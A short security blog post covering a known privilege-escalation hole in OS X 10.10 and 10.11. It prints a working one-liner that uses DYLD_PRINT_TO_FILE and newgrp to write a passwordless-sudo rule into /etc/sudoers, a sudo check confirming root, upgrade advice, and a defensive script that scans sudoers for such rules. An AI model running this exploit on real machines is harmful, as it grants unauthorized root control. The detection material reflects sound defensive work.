No need to know the root password of OS X 10.10 and 10.11

Tomas Savenas
May 18, 2020

A PoC showing how a one-liner on an old version of macOS gets you a root shell.
I tested it on El Capitan, and it probably works with the previous iteration of the OS.
The command for the terminal is below. More about the PoC: [1].
Ignore this output: “bash: line 1: 3: Bad file descriptor.”

echo 'echo "$(whoami) ALL=(ALL) NOPASSWD:ALL" >&3' | DYLD_PRINT_TO_FILE=/etc/sudoers newgrp

Let’s check for sudo:

sudo -s && whoami

If everything is all right, you will see a # at the beginning and the root name.

The best fix is to upgrade the operating system. macOS High Sierra has support until this November. For some models, OS support isn’t available, so it would help to upgrade your hardware. There is an excellent article about supported hardware and software [2].

I strongly recommend getting a MacBook Pro 2012, or something from 2012 or later, which supports macOS Catalina; it will get the latest security patches.
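To check a machine for the footprint the one-liner above leaves, the following added example (not part of the original post) scans a sudoers file for active rules that grant passwordless ALL and tests whether a version string is one the post names. The function names, the sample sudoers content and the version string are constructed for illustration.

```sh
#!/bin/sh
# Added example: look for the sudoers line the one-liner appends.

# Exit 0 when the version string is one the post names (10.10.x or 10.11.x).
is_named_version() {
    case "$1" in
        10.10|10.10.*|10.11|10.11.*) return 0 ;;
        *) return 1 ;;
    esac
}

# Print "line-number:rule" for each active rule granting passwordless ALL.
find_nopasswd_all() {
    awk '
        # Skip comments and #include lines; "#501 ..." is a uid rule, keep it.
        /^[ \t]*#[^0-9]/ || /^[ \t]*#$/ { next }
        {
            rule = $0
            gsub(/[ \t]+/, "", rule)   # sudoers allows spaces around "=" and ":"
            if (rule ~ /=(\([^)]*\))?NOPASSWD:ALL$/) print NR ":" $0
        }
    ' "$1"
}

# Constructed sample input, not a real system file.
sample=$(mktemp)
trap 'rm -f "$sample"' EXIT
cat > "$sample" <<'EOF'
# constructed sample sudoers
root    ALL=(ALL) ALL
%admin  ALL=(ALL) ALL
# tomas ALL=(ALL) NOPASSWD:ALL
deploy  ALL=(ALL) NOPASSWD: /usr/bin/rsync
tomas ALL=(ALL) NOPASSWD:ALL
EOF

# On a Mac, use "$(sw_vers -productVersion)" in place of the constructed string.
if is_named_version "10.11.6"; then
    echo "OS version is one the post names; rules to review:"
fi
# On a Mac, run as root and pass /etc/sudoers instead of the sample.
find_nopasswd_all "$sample"
```

Any rule it reports that you did not add yourself should be removed with visudo, followed by the OS upgrade described above.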

References

[1] https://www.scmagazineuk.com/tweetable-hack-pwn-mac/article/1479054
[2] https://eshop.macsales.com/guides/Mac_OS_X_Compatibility

Tomas Savenas

Cybersecurity enthusiast; the most active Lithuanian on the TryHackMe platform; Master's student in Innovation Management and Entrepreneurship @ KTU